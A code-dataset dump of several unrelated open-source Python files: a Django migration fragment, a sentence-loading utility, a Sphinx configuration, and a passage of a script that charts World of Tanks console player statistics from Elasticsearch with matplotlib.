('lowfat', '0144_auto_20190123_1534'),
]
operations = [
migrations.AddField(
model_name='fund',
name='success_reported',
field=models.TextField(blank=True),
),
migrations.AddField(
model_name='fund',
name='success_targeted',
field=models.TextField(default=''),
preserve_default=False,
),
migrations.AddField(
model_name='historicalfund',
name='success_reported',
field=models.TextField(blank=True),
),
migrations.AddField(
model_name='historicalfund',
name='success_targeted',
field=models.TextField(default=''),
preserve_default=False,
),
]
| 26.684211 | 49 | 0.573964 | [
"BSD-3-Clause"
] | elena-kolomeets/lowfat | lowfat/migrations/0145_auto_20181213_0921.py | 1,014 | Python |
#!/bin/python
"""
This is a class for loading input sentences
"""
class SentenceAttr:
def __init__(self, attr_list):
self.article_id = attr_list[1]
self.title = attr_list[2]
self.sentence = attr_list[3]
self.article_structure = attr_list[4]
self.place = attr_list[5]
def __str__(self):
return "Article Id: " + self.article_id + "\n" + "Title: " + self.title + "\n"\
+"Sentence: " + self.sentence + "\n" +\
"Article Structure: " + self.article_structure + "\n" + "Place: " + self.place + "\n"
class LoadSentences:
def __init__(self, filepath, num):
self.filepath = filepath
self.num = num
"""对导入的文本做简单清洗"""
def Process(self, line):
line = line.replace('\n', '')
line_list = line.split("|")
return SentenceAttr(line_list)
"""逐行读取文件并返回迭代器"""
def Reader(self):
f = open(self.filepath)
line = f.readline()
count = 0
while line:
if count == self.num:
break
yield self.Process(line)
line = f.readline()
count += 1
f.close()
def test():
sentences_path = "../0_output.txt0.txt"
sentences = LoadSentences(sentences_path, 5).Reader()
for each in sentences:
print(each)
if __name__ == "__main__":
test()
| 24.263158 | 102 | 0.54953 | [
"MIT"
] | lychyzclc/High-throughput-relation-extraction-algorithm | src/util/load_sentence.py | 1,429 | Python |
#!/usr/bin/env python
#
# sqpdfo documentation build configuration file, created by
# sphinx-quickstart on Fri Jun 9 13:47:02 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory is
# relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('..'))
import sqpdfo
# -- General configuration ---------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'SQPDFO'
copyright = "2019, Anke Troeltzsch"
author = "Anke Troeltzsch"
# The version info for the project you're documenting, acts as replacement
# for |version| and |release|, also used in various other places throughout
# the built documents.
#
# The short X.Y version.
version = sqpdfo.__version__
# The full version, including alpha/beta/rc tags.
release = sqpdfo.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ---------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'sqpdfodoc'
# -- Options for LaTeX output ------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto, manual, or own class]).
latex_documents = [
(master_doc, 'sqpdfo.tex',
'SQPDFO Documentation',
'Anke Troeltzsch', 'manual'),
]
# -- Options for manual page output ------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'sqpdfo',
'SQPDFO Documentation',
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'sqpdfo',
'SQPDFO Documentation',
author,
'sqpdfo',
'One line description of project.',
'Miscellaneous'),
]
| 29.288344 | 77 | 0.683703 | [
"BSD-3-Clause"
] | DLR-SC/sqpdfo | docs/conf.py | 4,774 | Python |
from argparse import ArgumentParser
from collections import OrderedDict
from datetime import datetime, timedelta
from elasticsearch6 import Elasticsearch
from json import dump, load
from math import pi, sin, cos
from matplotlib import pyplot as plt
from matplotlib import dates as mdates
from matplotlib import ticker as mtick
from requests import get
from tweepy import OAuthHandler, API
import traceback
# Multi-day, use gte
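# The date bounds in the query bodies below are left as None placeholders and are
# filled in at runtime (see query_es_for_graphs and the other query helpers) before
# the queries are sent to Elasticsearch.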
battles_query = {
"aggs": {
"2": {
"date_histogram": {
"field": "date",
"interval": "1d",
"min_doc_count": 0
},
"aggs": {
"3": {
"terms": {
"field": "console.keyword",
"size": 2,
"order": {
"1": "desc"
},
"min_doc_count": 0
},
"aggs": {
"1": {
"sum": {
"field": "battles"
}
}
}
}
}
}
},
"size": 0,
"_source": {"excludes": []},
"stored_fields": ["*"],
"script_fields": {},
"docvalue_fields": [
{
"field": "date",
"format": "date_time"
}
],
"query": {
"bool": {
"must": [
{"match_all": {}},
{"match_all": {}},
{
"range": {
"date": {
"gte": None,
"lte": None,
"format": "date"
}
}
}
],
"filter": [],
"should": [],
"must_not": []
}
}
}
# Multi-day, use gte
players_query = {
"aggs": {
"2": {
"date_histogram": {
"field": "date",
"interval": "1d",
"min_doc_count": 0
},
"aggs": {
"3": {
"terms": {
"field": "console.keyword",
"size": 2,
"order": {
"_count": "desc"
},
"min_doc_count": 0
}
}
}
}
},
"size": 0,
"_source": {"excludes": []},
"stored_fields": ["*"],
"script_fields": {},
"docvalue_fields": [
{
"field": "date",
"format": "date_time"
}
],
"query": {
"bool": {
"must": [
{"match_all": {}},
{"match_all": {}},
{
"range": {
"date": {
"gte": None,
"lte": None,
"format": "date"
}
}
}
],
"filter": [],
"should": [],
"must_not": []
}
}
}
unique_count_query = {
"aggs": {
"2": {
"terms": {
"field": "console.keyword",
"size": 2,
"order": {
"1": "desc"
}
},
"aggs": {
"1": {
"cardinality": {
"field": "account_id"
}
}
}
}
},
"size": 0,
"_source": {"excludes": []},
"stored_fields": ["*"],
"script_fields": {},
"docvalue_fields": [
{
"field": "date",
"format": "date_time"
}
],
"query": {
"bool": {
"must": [
{"match_all": {}},
{"match_all": {}},
{
"range": {
"date": {
"gte": None,
"lte": None,
"format": "date"
}
}
}
],
"filter": [],
"should": [],
"must_not": []
}
}
}
new_players_query = {
"aggs": {
"2": {
"date_histogram": {
"field": "created_at",
"interval": "1d",
"min_doc_count": 0
},
"aggs": {
"3": {
"terms": {
"field": "console.keyword",
"size": 2,
"order": {
"_count": "desc"
},
"min_doc_count": 0
}
}
}
}
},
"size": 0,
"_source": {"excludes": []},
"stored_fields": ["*"],
"script_fields": {},
"docvalue_fields": [
{
"field": "created_at",
"format": "date_time"
}
],
"query": {
"bool": {
"must": [
{"match_all": {}},
{"match_all": {}},
{
"range": {
"created_at": {
"gte": None,
"lt": None,
"format": "date"
}
}
}
],
"filter": [],
"should": [],
"must_not": []
}
}
}
personal_players_query = {
'sort': [],
'_source': {'excludes': []},
'aggs': {
'2': {
'date_histogram': {
'field': 'date',
'interval': '1d',
'min_doc_count': 0
}
}
},
'stored_fields': ['_source'],
'script_fields': {},
'docvalue_fields': [{'field': 'date', 'format': 'date_time'}],
'query': {
'bool': {
'must': [
{'match_all': {}},
{
'range': {
'date': {
'gt': None,
'lte': None,
'format': 'date'
}
}
}
],
'filter': [],
'should': [],
'must_not': []
}
},
'size': 500
}
accounts_per_battles_range_query = {
'aggs': {
'2': {
'range': {
'field': 'battles',
'ranges': [
{'from': 1, 'to': 5},
{'from': 5, 'to': 10},
{'from': 10, 'to': 20},
{'from': 20, 'to': 30},
{'from': 30, 'to': 40},
{'from': 40, 'to': 50},
{'from': 50}
],
'keyed': True
},
'aggs': {
'3': {
'terms': {
'field': 'console.keyword',
'size': 2,
'order': {'_count': 'desc'}
}
}
}
}
},
'size': 0,
'_source': {'excludes': []},
'stored_fields': ['*'],
'script_fields': {},
'docvalue_fields': [{'field': 'date', 'format': 'date_time'}],
'query': {
'bool': {
'must': [
{'match_all': {}},
{'match_all': {}},
{'range': {'date': {'gt': None, 'lte': None, 'format': 'date'}}}
],
'filter': [],
'should': [],
'must_not': []
}
}
}
five_battles_a_day_query = {
'aggs': {
'4': {
'date_histogram': {
'field': 'date',
'interval': '1d',
'min_doc_count': 0
},
'aggs': {
'3': {
'terms': {
'field': 'console.keyword',
'size': 2,
'order': {'_count': 'desc'}
},
'aggs': {
'2': {
'range': {
'field': 'battles',
'ranges': [{'from': 5, 'to': None}],
'keyed': True
}
}
}
}
}
}
},
'size': 0,
'_source': {'excludes': []},
'stored_fields': ['*'],
'script_fields': {},
'docvalue_fields': [{'field': 'date', 'format': 'date_time'}],
'query': {
'bool': {
'must': [
{'match_all': {}},
{'match_all': {}},
{
'range': {
'date': {
'gte': None,
'lte': None,
'format': 'date'
}
}
}
],
'filter': [],
'should': [],
'must_not': []
}
}
}
CW_TANKS = 'ASSIGN `build_cw_tanks_list(config)` TO ME'
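# Placeholder string: presumably swapped out at runtime for a Lucene query string
# produced by build_cw_tanks_list(config), enumerating the Cold War tank_ids that
# the two queries below filter on.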
cw_popular_tanks_query = {
"aggs": {
"2": {
"date_histogram": {
"field": "date",
"interval": "1d",
"min_doc_count": 0
},
"aggs": {
"4": {
"terms": {
"field": "console.keyword",
"size": 5,
"order": {
"1": "desc"
}
},
"aggs": {
"1": {
"sum": {
"field": "battles"
}
},
"3": {
"terms": {
"field": "tank_id",
"size": 5,
"order": {
"1": "desc"
}
},
"aggs": {
"1": {
"sum": {
"field": "battles"
}
}
}
}
}
}
}
}
},
"size": 0,
"_source": {
"excludes": []
},
"stored_fields": [
"*"
],
"script_fields": {},
"docvalue_fields": [
{
"field": "date",
"format": "date_time"
}
],
"query": {
"bool": {
"must": [
{
"query_string": {
"query": CW_TANKS,
"analyze_wildcard": True,
"default_field": "*"
}
},
{
"range": {
"date": {
"gte": None,
"lte": None,
"format": "date"
}
}
}
],
"filter": [],
"should": [],
"must_not": []
}
}
}
ww2_popular_tanks_query = {
"aggs": {
"2": {
"date_histogram": {
"field": "date",
"interval": "30m",
"time_zone": "America/Chicago",
"min_doc_count": 0
},
"aggs": {
"4": {
"terms": {
"field": "console.keyword",
"size": 5,
"order": {
"1": "desc"
}
},
"aggs": {
"1": {
"sum": {
"field": "battles"
}
},
"3": {
"terms": {
"field": "tank_id",
"size": 5,
"order": {
"1": "desc"
}
},
"aggs": {
"1": {
"sum": {
"field": "battles"
}
}
}
}
}
}
}
}
},
"size": 0,
"_source": {
"excludes": []
},
"stored_fields": [
"*"
],
"script_fields": {},
"docvalue_fields": [
{
"field": "date",
"format": "date_time"
}
],
"query": {
"bool": {
"must": [
{
"query_string": {
"query": 'NOT (' + CW_TANKS + ')',
"analyze_wildcard": True,
"default_field": "*"
}
},
{
"range": {
"date": {
"gte": None,
"lte": None,
"format": "date"
}
}
}
],
"filter": [],
"should": [],
"must_not": []
}
}
}
BATTLES_PNG = '/tmp/battles.png'
PLAYERS_PNG = '/tmp/players.png'
NEWPLAYERS_PNG = '/tmp/newplayers.png'
AVERAGE_PNG = '/tmp/average.png'
ACCOUNTAGE_PNG = '/tmp/accountage.png'
BATTLERANGE_PNG = '/tmp/battlerange.png'
FIVEADAY_PNG = '/tmp/fiveaday.png'
PLAYERSLONG_PNG = '/tmp/playerslong.png'
BATTLESLONG_PNG = '/tmp/battleslong.png'
AVERAGELONG_PNG = '/tmp/averagelong.png'
MODEBREAKDOWN_PNG = '/tmp/modebreakdown.png'
MODEBREAKDOWNLONG_PNG = '/tmp/modebreakdownlong.png'
MODEBREAKDOWNPERCENT_PNG = '/tmp/modebreakdownpercent.png'
MODEBREAKDOWNPERCENTLONG_PNG = '/tmp/modebreakdownpercentlong.png'
def manage_config(mode, filename='config.json'):
if mode == 'read':
with open(filename) as f:
return load(f)
elif mode == 'create':
with open(filename, 'w') as f:
dump(
{
'days': 14,
'long term': 90,
'omit errors long term': True,
'twitter': {
'api key': '',
'api secret key': '',
'access token': '',
'access token secret': '',
'message': "Today's update on the active player count and total battles per platform for #worldoftanksconsole."
},
'elasticsearch': {
'hosts': ['127.0.0.1']
},
'battle index': 'diff_battles-*',
'tank index': 'diff_tanks-*',
'unique': [7, 14, 30],
'account age': [7, 30, 90, 180, 365, 730, 1095, 1460, 1825],
'battle ranges': [
{"from": 1, "to": 5},
{"from": 5, "to": 10},
{"from": 10, "to": 20},
{"from": 20, "to": 30},
{"from": 30, "to": 40},
{"from": 40, "to": 50},
{"from": 50}
],
'watermark text': '@WOTC_Tracker',
'wg api key': 'DEMO'
                },
                f
            )
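# Typical flow (sketch): manage_config('create') writes a default config.json, which is
# then edited by hand; manage_config('read') loads it back as the dict consumed by the
# query and graphing helpers below.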
def query_es_for_graphs(config):
now = datetime.utcnow()
then = now - timedelta(days=config['days'])
es = Elasticsearch(**config['elasticsearch'])
# Setup queries
battles_query['query']['bool'][
'must'][-1]['range']['date']['gte'] = then.strftime('%Y-%m-%d')
battles_query['query']['bool'][
'must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
players_query['query']['bool'][
'must'][-1]['range']['date']['gte'] = then.strftime('%Y-%m-%d')
players_query['query']['bool'][
'must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
new_players_query['query']['bool'][
'must'][-1]['range']['created_at']['gte'] = then.strftime('%Y-%m-%d')
new_players_query['query']['bool'][
'must'][-1]['range']['created_at']['lt'] = now.strftime('%Y-%m-%d')
# Query Elasticsearch
battles = es.search(index=config['battle index'], body=battles_query)
players = es.search(index=config['battle index'], body=players_query)
newplayers = es.search(index='players', body=new_players_query)
# Filter numbers
battles_xbox = []
battles_ps = []
players_xbox = []
players_ps = []
newplayers_xbox = []
newplayers_ps = []
averages_xbox = []
averages_ps = []
for bucket in battles['aggregations']['2']['buckets']:
if not bucket['3']['buckets']:
battles_xbox.append(0)
battles_ps.append(0)
continue
for subbucket in bucket['3']['buckets']:
if subbucket['key'] == 'xbox':
battles_xbox.append(subbucket['1']['value'])
else:
battles_ps.append(subbucket['1']['value'])
for bucket in players['aggregations']['2']['buckets']:
if not bucket['3']['buckets']:
players_xbox.append(0)
players_ps.append(0)
continue
for subbucket in bucket['3']['buckets']:
if subbucket['key'] == 'xbox':
players_xbox.append(subbucket['doc_count'])
else:
players_ps.append(subbucket['doc_count'])
for bucket in newplayers['aggregations']['2']['buckets']:
if not bucket['3']['buckets']:
newplayers_xbox.append(0)
newplayers_ps.append(0)
for subbucket in bucket['3']['buckets']:
if subbucket['key'] == 'xbox':
newplayers_xbox.append(subbucket['doc_count'])
else:
newplayers_ps.append(subbucket['doc_count'])
for b, p in zip(battles_xbox, players_xbox):
averages_xbox.append(b / p)
for b, p in zip(battles_ps, players_ps):
averages_ps.append(b / p)
dates = [b['key_as_string'].split('T')[0] for b in players[
'aggregations']['2']['buckets']]
newplayers_dates = [b['key_as_string'].split('T')[0] for b in newplayers[
'aggregations']['2']['buckets']]
return dates, battles_xbox, battles_ps, players_xbox, players_ps, newplayers_dates, newplayers_xbox, newplayers_ps, averages_xbox, averages_ps
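# The tuple above is consumed positionally, e.g.
#   create_activity_graphs(*query_es_for_graphs(config))
# in __main__ below; the order is dates, per-platform battles, per-platform
# players, new-player dates/counts, then per-platform averages.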
def query_es_for_unique(config):
now = datetime.utcnow()
es = Elasticsearch(**config['elasticsearch'])
unique = {'Xbox': [], 'Playstation': []}
unique_count_query['query']['bool'][
'must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
for earliest in config['unique']:
unique_count_query['query']['bool']['must'][-1]['range']['date'][
'gte'] = (now - timedelta(days=earliest)).strftime('%Y-%m-%d')
results = es.search(index=config['battle index'], body=unique_count_query)
for bucket in results['aggregations']['2']['buckets']:
if bucket['key'] == 'xbox':
unique['Xbox'].append(bucket['1']['value'])
else:
unique['Playstation'].append(bucket['1']['value'])
return unique
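# Shape of the result above: one value per look-back window in config['unique'],
# e.g. {'Xbox': [n7, n14, n30], 'Playstation': [n7, n14, n30]} for the default
# [7, 14, 30] windows (n* are placeholder counts, not real data).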
def create_activity_graphs(dates, battles_xbox, battles_ps, players_xbox, players_ps, newplayers_dates, newplayers_xbox, newplayers_ps, averages_xbox, averages_ps, watermark_text='@WOTC_Tracker'):
shifted_dates = [(datetime.strptime(d, '%Y-%m-%d') - timedelta(days=1)).strftime('%Y-%m-%d') for d in dates]
# Players PNG
plt.clf()
fig = plt.figure(figsize=(11, 8), dpi=150)
fig.suptitle('Active Accounts Per Platform')
# ax1 = plt.axes()
ax1 = fig.add_subplot(111)
ax1.tick_params(axis='x', labelrotation=45)
ax1.ticklabel_format(useOffset=False, style='plain')
ax1.set_xticklabels(shifted_dates, ha='right')
ax1.plot(shifted_dates, players_xbox, color='green', linewidth=2, label='Xbox')
ax1.plot(shifted_dates, players_ps, color='blue', linewidth=2, label='Playstation')
ax1.grid()
ax1.legend()
ax1.text(0.5, 1.05, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
fig.savefig(PLAYERS_PNG)
del fig
# Battles PNG
plt.clf()
fig = plt.figure(figsize=(11, 8), dpi=150)
fig.suptitle('Total Battles Per Platform')
# ax = plt.axes()
ax1 = fig.add_subplot(111)
ax1.tick_params(axis='x', labelrotation=45)
ax1.ticklabel_format(useOffset=False, style='plain')
ax1.set_xticklabels(shifted_dates, ha='right')
ax1.plot(shifted_dates, battles_xbox, color='green', linewidth=2, label='Xbox')
ax1.plot(shifted_dates, battles_ps, color='blue', linewidth=2, label='Playstation')
ax1.grid()
ax1.legend()
ax1.text(0.5, 1.05, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
fig.savefig(BATTLES_PNG)
del fig
# New Players PNG
plt.clf()
fig = plt.figure(figsize=(11, 8), dpi=150)
fig.suptitle('New Accounts Per Platform')
# ax = plt.axes()
ax1 = fig.add_subplot(111)
ax1.tick_params(axis='x', labelrotation=45)
ax1.ticklabel_format(useOffset=False, style='plain')
    ax1.set_xticklabels(newplayers_dates, ha='right')
ax1.plot(newplayers_dates, newplayers_xbox, color='green', linewidth=2, label='Xbox')
ax1.plot(newplayers_dates, newplayers_ps, color='blue', linewidth=2, label='Playstation')
ax1.grid()
ax1.legend()
ax1.text(0.5, 1.05, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
fig.savefig(NEWPLAYERS_PNG)
del fig
# Averages PNG
plt.clf()
fig = plt.figure(figsize=(11, 8), dpi=150)
fig.suptitle('Average Battles Played Per Account Per Platform')
# ax = plt.axes()
ax1 = fig.add_subplot(111)
ax1.tick_params(axis='x', labelrotation=45)
ax1.ticklabel_format(useOffset=False, style='plain')
ax1.set_xticklabels(shifted_dates, ha='right')
ax1.plot(shifted_dates, averages_xbox, color='green', linewidth=2, label='Xbox')
ax1.plot(shifted_dates, averages_ps, color='blue', linewidth=2, label='Playstation')
ax1.grid()
ax1.legend()
ax1.text(0.5, 1.05, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
fig.savefig(AVERAGE_PNG)
del fig
def query_es_for_active_accounts(config):
now = datetime.utcnow()
then = now - timedelta(days=1)
es = Elasticsearch(**config['elasticsearch'])
personal_players_query['query']['bool']['must'][-1]['range']['date']['gt'] = then.strftime('%Y-%m-%d')
personal_players_query['query']['bool']['must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
# Get all account IDs of active players
hits = []
response = es.search(index=config['battle index'], body=personal_players_query, scroll='30s')
while len(response['hits']['hits']):
hits.extend(response['hits']['hits'])
response = es.scroll(scroll_id=response['_scroll_id'], scroll='3s')
flattened = [doc['_source']['account_id'] for doc in hits]
# Query account information to get age details
player_info_extracted = []
for i in range(0, len(flattened), 10000):
active_player_info = es.mget(index='players', doc_type='player', body={'ids': flattened[i:i+10000]}, _source=['account_id', 'console', 'created_at'])
player_info_extracted.extend([doc['_source'] for doc in active_player_info['docs']])
sorted_player_info = sorted(player_info_extracted, key = lambda d: d['created_at'])
buckets = {
"xbox": OrderedDict((v, 0) for v in sorted(config['account age'])),
"ps": OrderedDict((v, 0) for v in sorted(config['account age'])),
"all": OrderedDict((v, 0) for v in sorted(config['account age']))
}
# Sum account ages based on range of age
buckets['xbox']['other'] = 0
buckets['ps']['other'] = 0
buckets['all']['other'] = 0
for player in sorted_player_info:
delta = now - datetime.strptime(player['created_at'], '%Y-%m-%dT%H:%M:%S')
for key in buckets['all'].keys():
if not isinstance(key, int):
buckets['all'][key] += 1
buckets[player['console']][key] += 1
break
elif delta.total_seconds() <= (key * 24 * 60 * 60):
buckets['all'][key] += 1
buckets[player['console']][key] += 1
break
return buckets
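# Result above: for each platform key ('xbox', 'ps', 'all'), an OrderedDict
# mapping each age threshold in days (from config['account age']) to the number
# of active accounts whose age falls in that bin, plus 'other' for accounts
# older than the largest threshold.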
def calc_label(value):
if value < 7:
return '{} day{}'.format(value, '' if value == 1 else 's')
elif 7 <= value < 30:
return '{} week{}'.format(value // 7, '' if value // 7 == 1 else 's')
elif 30 <= value < 365:
return '{} month{}'.format(value // 30, '' if value // 30 == 1 else 's')
else:
return '{} year{}'.format(value // 365, '' if value // 365 == 1 else 's')
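# Example outputs implied by the thresholds above (integer division):
#   calc_label(1) -> '1 day', calc_label(14) -> '2 weeks',
#   calc_label(90) -> '3 months', calc_label(365) -> '1 year'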
def calc_angle(wedge):
return (wedge.theta2 - wedge.theta1) / 2 + wedge.theta1
def create_account_age_chart(buckets, watermark_text='@WOTC_Tracker'):
plt.clf()
fig = plt.figure(figsize=(11, 8), dpi=150)
then = datetime.utcnow() - timedelta(days=1)
fig.suptitle("Breakdown of active accounts by account age for {}".format(then.strftime('%Y-%m-%d')))
ax1 = plt.subplot2grid((11, 1), (0, 0), rowspan=10)
ax1.axis('equal')
size = 0.125
outer_labels = []
prev = 0
for key in buckets['all'].keys():
if not isinstance(key, int):
outer_labels.append('>' + calc_label(prev))
else:
outer_labels.append('{} - {}'.format(calc_label(prev), calc_label(key)))
prev = key
# Outer pie chart
outer_cmap = plt.get_cmap("binary")
outer_colors = outer_cmap([i * 10 for i in range(10, len(buckets['all'].keys()) + 11)])
outer_wedges, outer_text, outer_autotext = ax1.pie(
buckets['all'].values(),
explode=[0.1 for __ in outer_labels],
radius=1,
colors=outer_colors,
wedgeprops=dict(width=size, edgecolor='w'),
autopct='%1.1f%%',
pctdistance=1.1
#labels=outer_labels
)
bbox_props = dict(boxstyle='square,pad=0.3', fc='w', ec='k', lw=0.72)
kw = dict(arrowprops=dict(arrowstyle='-'), bbox=bbox_props, zorder=0, va='center')
for i, wedge in enumerate(outer_wedges):
angle = calc_angle(wedge)
y = sin(angle * (pi / 180))
x = cos(angle * (pi / 180))
align = 'right' if x < 0 else 'left'
connectionstyle = 'angle,angleA=0,angleB={}'.format(angle)
kw['arrowprops'].update({'connectionstyle': connectionstyle})
ax1.annotate(
outer_labels[i],
xy=(x, y),
xytext=(1.35*(-1 if x < 0 else 1), 1.4*y),
horizontalalignment=align,
**kw
)
# Inner pie chart
inner_cmap = plt.get_cmap("tab20c")
pie_flat = list(zip(buckets['xbox'].values(), buckets['ps'].values()))
inner_labels = []
for pair in pie_flat:
inner_labels.extend(['xbox', 'ps'])
inner_colors = inner_cmap([1 if console == 'ps' else 9 for console in inner_labels])
inner_wedges, inner_text, inner_autotext = ax1.pie(
[item for sublist in pie_flat for item in sublist],
explode=[0.1 for __ in inner_labels],
radius=1.05-size,
colors=inner_colors,
wedgeprops=dict(width=size, edgecolor='w'),
autopct='',
pctdistance=0.9
)
# Replace inner text with actual values
for i, label, wedge, text in zip(range(len(inner_wedges)), inner_labels, inner_wedges, inner_autotext):
text.set_text(buckets[label]['other' if i // 2 > len(buckets['all'].keys()) - 1 else list(buckets['all'].keys())[i // 2]])
angle = calc_angle(wedge)
if 90 < angle < 270:
angle += 180
text.set_rotation(angle)
# Patch inner wedges to group together in explosion
# Influenced by: https://stackoverflow.com/a/20556088/1993468
groups = [[i, i+1] for i in range(0, len(inner_wedges), 2)]
radfraction = 0.1
for group in groups:
angle = ((inner_wedges[group[-1]].theta2 + inner_wedges[group[0]].theta1)/2) * (pi / 180)
for g in group:
wedge = inner_wedges[g]
wedge.set_center((radfraction * wedge.r * cos(angle), radfraction * wedge.r * sin(angle)))
# Add subplot in second row, below nested pie chart
ax2 = plt.subplot2grid((11, 1), (10, 0))
ax2.axhline(color='black', y=0)
# Xbox, Playstation
totals = [sum(buckets['xbox'].values()), sum(buckets['ps'].values()), sum(buckets['all'].values())]
ypos = -0.18
bottom = 0
height = 0.1
for i in range(len(totals) - 1):
width = totals[i] / totals[-1]
ax2.barh(ypos, width, height, left=bottom, color=inner_colors[i])
xpos = bottom + ax2.patches[i].get_width() / 2
bottom += width
ax2.text(xpos, ypos, '{} ({:.1f}%)'.format(totals[i], (totals[i] / totals[-1]) * 100), ha='center', va='center')
ax2.axis('off')
ax2.set_title('Total Active Players', y=0.325)
ax2.set_xlim(0, 1)
ax1.legend(inner_wedges[-2:], ['xbox', 'ps'], loc='lower right')
fig.text(0.5, 0.5, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
fig.savefig(ACCOUNTAGE_PNG)
del fig
def query_es_for_accounts_by_battles(config):
now = datetime.utcnow()
then = now - timedelta(days=1)
es = Elasticsearch(**config['elasticsearch'])
accounts_per_battles_range_query['query']['bool']['must'][-1]['range']['date']['gt'] = then.strftime('%Y-%m-%d')
accounts_per_battles_range_query['query']['bool']['must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
if 'battle ranges' in config:
accounts_per_battles_range_query['aggs']['2']['range']['ranges'] = config['battle ranges']
response = es.search(index=config['battle index'], body=accounts_per_battles_range_query)
buckets = {
"xbox": OrderedDict((v, 0) for v in response['aggregations']['2']['buckets'].keys()),
"ps": OrderedDict((v, 0) for v in response['aggregations']['2']['buckets'].keys()),
"all": OrderedDict((v, 0) for v in response['aggregations']['2']['buckets'].keys()),
}
for key, value in response['aggregations']['2']['buckets'].items():
buckets['all'][key] = value['doc_count']
for bucket in value['3']['buckets']:
buckets[bucket['key']][key] = bucket['doc_count']
return buckets
def create_accounts_by_battles_chart(buckets, watermark_text='@WOTC_Tracker'):
plt.clf()
fig = plt.figure(figsize=(11, 8), dpi=150)
then = datetime.utcnow() - timedelta(days=1)
fig.suptitle("Breakdown of accounts by number of battles played for {}".format(then.strftime('%Y-%m-%d')))
# ax1 = plt.subplot2grid((11, 1), (0, 0), rowspan=10)
ax1 = plt.axes()
ax1.axis('equal')
size = 0.125
outer_labels = []
prev = 0
for key in buckets['all'].keys():
parts = key.split('-')
outer_labels.append('{}-{} battles'.format(int(float(parts[0])) if parts[0] != '*' else parts[0], int(float(parts[1])) - 1 if parts[1] != '*' else parts[1]))
# Outer pie chart
outer_cmap = plt.get_cmap("binary")
outer_colors = outer_cmap([i * 10 for i in range(10, len(buckets['all'].keys()) + 11)])
outer_wedges, outer_text, outer_autotext = ax1.pie(
buckets['all'].values(),
explode=[0.1 for __ in outer_labels],
radius=1,
colors=outer_colors,
wedgeprops=dict(width=size, edgecolor='w'),
autopct='%1.1f%%',
pctdistance=1.1
#labels=outer_labels
)
bbox_props = dict(boxstyle='square,pad=0.3', fc='w', ec='k', lw=0.72)
kw = dict(arrowprops=dict(arrowstyle='-'), bbox=bbox_props, zorder=0, va='center')
for i, wedge in enumerate(outer_wedges):
angle = calc_angle(wedge)
y = sin(angle * (pi / 180))
x = cos(angle * (pi / 180))
align = 'right' if x < 0 else 'left'
connectionstyle = 'angle,angleA=0,angleB={}'.format(angle)
kw['arrowprops'].update({'connectionstyle': connectionstyle})
ax1.annotate(
outer_labels[i],
xy=(x, y),
xytext=(1.35*(-1 if x < 0 else 1), 1.4*y),
horizontalalignment=align,
**kw
)
# Inner pie chart
inner_cmap = plt.get_cmap("tab20c")
pie_flat = list(zip(buckets['xbox'].values(), buckets['ps'].values()))
inner_labels = []
for pair in pie_flat:
inner_labels.extend(['xbox', 'ps'])
inner_colors = inner_cmap([1 if console == 'ps' else 9 for console in inner_labels])
inner_wedges, inner_text, inner_autotext = ax1.pie(
[item for sublist in pie_flat for item in sublist],
explode=[0.1 for __ in inner_labels],
radius=1.05-size,
colors=inner_colors,
wedgeprops=dict(width=size, edgecolor='w'),
autopct='',
pctdistance=0.9
)
# Replace inner text with actual values
for i, label, wedge, text in zip(range(len(inner_wedges)), inner_labels, inner_wedges, inner_autotext):
